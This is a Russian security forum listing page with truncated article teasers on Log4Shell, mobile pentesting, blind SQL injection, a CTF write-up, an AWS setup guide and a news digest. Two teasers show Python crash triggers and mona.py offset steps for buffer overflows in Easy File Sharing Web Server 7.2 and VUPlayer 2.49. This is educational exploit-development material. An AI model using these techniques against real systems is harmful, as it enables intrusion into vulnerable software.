• Бесплатный ВЕБИНАР по OSINT с Екатериной Тьюринг: ➡️9 февраля в 19:00 (мск) пройдет урок

    Как безопасно искать информацию в открытых источниках

    🔥 Записаться 🔥

Форум информационной безопасности - Codeby.net

Статья А как это было? - Log4Shell

  • 3 922
  • 2
Здравия всем, дамы и господа. Пока статья о Conti готовится я решил объеденить все материалы, что сейчас есть на Log4Shell, т.к. тема всё-таки новая, а Conti уже и так достаточно долго ждал, подождёт ещё недельку.

HowItWas.jpg


24 ноября

Группа облачной безопасности Alibaba сообщает Apache об уязвимости.

1-10 декабря

Имеются сообщения об использовании уязвимости злоумышленниками.

10 декабря

Я думаю многие из вас читали мою новостную статью за тот период. Тогда я впервые узнал про Log4Shell. Думаю, некоторые из вас тоже.

Первый PoC-эксплойт (Proof of Concept) появился в сети в ночь с 9 на 10 декабря, что, видимо, и стало точкой невозврата.

После появления превого, следующие эксплойты для критической уязвимости нулевого...

Статья Stryker - или как я пытаюсь перевернуть мобильный пентест!

  • 9 301
  • 5
Привет всем, я снова бросил себе вызов по мобильной разработке и кажется справился на отлично!) Но это судить не мне, а вам, приятного чтения!


Идея и Дисклеймер

Давайте будем честны, большинство людей считают мобильный пентест "невозможным", "неудобным" или "только терминал". И скорее именно из-за этого — я и решил написать свою собственную программу которая способна убить эти стереотипы!(надеюсь). P.s. те кто "только терминал, только хардкор, только не с телефона", просьба не читать дальше ведь там GUI 😅

1. Анализ Конкурентов

Ну во-первых, стоит рассмотреть что уже есть, ведь из-за каких-то приложений возникли мнения выше!

1) Nethunter
Детище offsec на Debian. Так как это обычный linux, то он умеет "почти все" что и ПК, ограничения только по железу.

photo_2021-12-28_21-03-58.jpg
...

Статья Автоматизация эксплуатации слепой инъекции при помощи Burp Suite

  • 7 507
  • 10
Привет всем!

На написание этой статьи меня сподвигло обучение на курсах WAPT от Codeby. Получилось так, что по условиям обучения, не приветствуется использование любых сканеров уязвимостей или автоматических средств их эксплуатации (sqlmap, tplmap и др.). На экзамене это будет строжайше запрещено. Организаторы настроены научить нас эксплуатировать все уязвимости вручную (ну или почти вручную). Не возбраняется использование только программы Burp Suite или самописных скриптов на, например, Python или Bash. К моему глубочайшему сожалению, я не могу похвастаться профессиональным или хотя бы приемлемым владением данных языков.

Поэтому при решении задач по SQL-инъекциям, где они были слепые, мне приходилось рассчитывать на программу Burp Suite и собственную зад...цу (которую приходилось отсиживать в процессе извлечении информации из базы данных (БД). Все дело в том, что слепая SQL-инъекция (Blind SQL-injection) это такой...​

Школа SQLIM лаборатория 90 дней - старт 3 января

  • 3 393
  • 0
Доступ к лаборатории курса SQLIM и лицензирование

Стоимость доступа к лаборатории на 90 дней 6000 рублей

Записаться

Со второго потока курса, мы решили открыть платный доступ к лаборатории курса «SQL-injection Master». Это позволит сэкономить средства, а также оценить свой уровень подготовки.
  • Лаборатория состоит из 68 заданий разной сложности, и 10 заданий экзамена.
  • Все сдавшие экзамен, вне зависимости от того была ли это покупка полного курса, или только доступа к лаборатории, получают бонусную методичку и сертификат.
Для кого такой подход может быть интересен:
  • Если вы уже имеете серьёзный опыт раскрутки SQLi, и хотите получить незабываемое приключение при прохождении тасков.
  • Если вы считаете, что имеете большой опыт раскрутки SQLi...

CTF Writeup School: 1 Vulnhub - Моё первое переполнение буфера

  • 15 054
  • 14
Приветствую!

В одном из прошлых врайтапов я описал прохождение коробки альтернативным способом, вместо использования ошибки переполнения буфера и сказал, что пошел развиваться в направление The buffer overflow...

И вот, наконец, в данном прохождении, я представлю свои первые успехи в деле "о переполнении буфера". Ну, к делу...

Исходные данные:
Атакуемая машина под управлением Debian linux, на которой есть 2 флага.
Основная машина (с которой проводится атака) под управлением ОС Kali Linux и ВМ с windows 7
Задача: получить 2 флага с целевой машины и права пользователя root.

Выяснив ip адрес атакуемой машины, при помощи команды
kali@kali:~/Lab$ sudo netdiscover

сканируем её nmap'ом:
kali@kali:~/Lab$ nmap -A -p- -v 192.168.3.125

[ATTACH type="full"...

Статья Easy File Sharing Web Server 7.2 SEH overflow

  • 1 849
  • 0
Тестирование проводилось на Windows XP SP3 x86 En (no dep)

Уязвимое ПО:

Запускаем ПО

1640554135976.png


И аттачимся отладчиком Immunity Debugger к процессу, дальше передаем программе входной поток. Посмотрим как оно себя поведет.

Python:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from struct import pack
import socket
payload = "A"*5000

exploit = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
exploit.connect(("127.0.0.1",80))
exploit.send("GET " + payload + " HTTP/1.1\r\n")
exploit.close()

1640554171427.png


посмотрим Chain SEH

1640554187682.png


Сгенерирум строку паттерн используя плагин mona.py

!mona pc 50000

1640554203618.png


Скопируем сгенерированную строку ASCII строку в наш триггер сплойт...

Школа WAPT от лица студента

  • 2 693
  • 1
Привет, Codeby! Хочу немного рассказать о своем опыте прохождения курса.

Я сам студент скромного беларусского вуза, учусь на схемотехника и немного играю в CTF. До попадания на курс имелся небольшой опыт пентеста, в основном полученный на HTB и аналогичных площадках. На курс WAPT я попал после The Standoff, когда Codeby заметили нашу команду Bulba Hackers на 5 месте и помогли получить курс бедным студентам =)

К курсу в самом начале я относился не очень серьезно, даже не открывал методички и не смотрел видео, думая, что там не будет для меня новой информации, но потом я все же нашел для себя много нового, об этом расскажу дальше.

Пассив

После получения впн конфига я сразу же пошел смотреть таски. Первые несколько задач решались довольно быстро, кроме задачи с нахождением реального IP, в этом таске я мучительно пытался сабмитать IP и локацию серверов CDN от CF и даже одного сервера, который светился в Censys, но все они не подходили, все же в один момент...

Статья Как бесплатно арендовать VPS у AMAZON, а также его первичная настройка.

  • 10 871
  • 9
Я старался сделать это пошаговое руководство как можно более подробным. В данном руководстве мы за 3 этапа развернем свой собственный VPS, в облачной инфраструктуре (AWS), с помощью бесплатного аккаунта (на 12 месяцев), на инстансе (виртуальной машине) под управлением Debian 10.

Этапы

  1. Регистрация бесплатного аккаунта AWS
  2. Создание инстанса AWS
  3. Подключение к инстансу AWS

1. Регистрация аккаунта AWS

Для регистрации бесплатного аккаунта AWS требуется реальный номер телефона и платежеспособная кредитная карта Visa или Mastercard. Для проверки валидности карты, при регистрации списывается 1$ который в дальнейшем возвращается.

1.1. Открытие консоли управления AWS

Переходим по адресу...

Статья Новостной дайджест по ИБ/IT за 20.12-27.12

  • 2 349
  • 1
Здравия всем, дамы и господа, речь сегодня вновь пойдёт пойдёт о прошлом. О том что произошло и во что это, возможно, выльется. Приглашаю вас к прочтению и приятного времяпрепровождения.

IbIt.jpg


Если вы это видите, значит меня уже нет

Очень частый приём из медиа-культуры, однако не так давно он стал реальностью. Как выяснилось, господин Сачков ещё год назад записал видео на случай своего убийства или ареста. Он переслал ролик своим близким и друзьям. В нем Сачков рассказывает, что за ним следят, и он опасается того, что неизвестные лица его убьют. Также Сачков предполагал, что правоохранительные органы могут его обвинить в госизмене и арестовать. А его, как мы помним, арестовали именно по подозрению в госизмене. Сейчас эта информация просто существует в вакууме и, насколько мне известно, развития не получила...

Статья VUPlayer 2.49 .wax vanilla EIP overflow

  • 1 521
  • 0
Тестрирование проводилось на ОС Windows 7 x32 с отключенным DEP.

Создадим эксплойт триггер чтобы перезаписать регистр EIP.

Python:
#!/usr/bin/env python
# -*- coding: utf-8 -*-

payload = "A"*5000

file = open('exploit.wax', 'w')
print "Create file exploit"
file.write(payload)
print "Write payload"

Запускаем Vuplayer под отладчиком

1640552858368.png


и скармливаем наш файловый сплойт.

1640552874728.png


Как мы видим мы успешно перезаписали EIP регистр. Теперь вычислим смещение до регистра EIP. Воспользуемся плагином mona.py

!mona pc 5000

1640552891943.png


Созданную ASCII строку скопируем в наш сплойт. Затем повторим процесс передачи созданного нами файла в уязвимую программу под отладчиком. Нажимаем Ctrl+F2, F9 и кормим файлом…

1640552907739.png


Как мы видим выполнение программы остановилось...